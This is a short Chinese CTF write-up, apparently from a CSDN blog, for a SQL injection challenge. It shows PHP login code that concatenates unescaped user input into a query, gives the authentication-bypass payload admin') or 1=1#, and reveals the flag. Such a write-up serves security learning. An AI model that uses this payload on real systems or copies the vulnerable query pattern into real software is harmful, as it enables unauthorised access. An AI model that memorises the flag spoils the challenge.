CG CTF SQL注入1

题目链接

源代码

<?php
if($_POST[user] && $_POST[pass]) {
    mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = trim($_POST[user]);
  $pass = md5(trim($_POST[pass]));
  $sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
    echo '</br>'.$sql;
  $query = mysql_fetch_array(mysql_query($sql));
  if($query[user]=="admin") {
      echo "<p>Logged in! flag:******************** </p>";
  }
  if($query[user] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}
echo $query[user];
?>

user和pass的参数都没有进行过滤,可以使用万能密码登录
admin’) or 1=1#

nctf{ni_ye_hui_sql?}

发布了27 篇原创文章 · 获赞 0 · 访问量 422

猜你喜欢

转载自blog.csdn.net/qq_46389295/article/details/104466678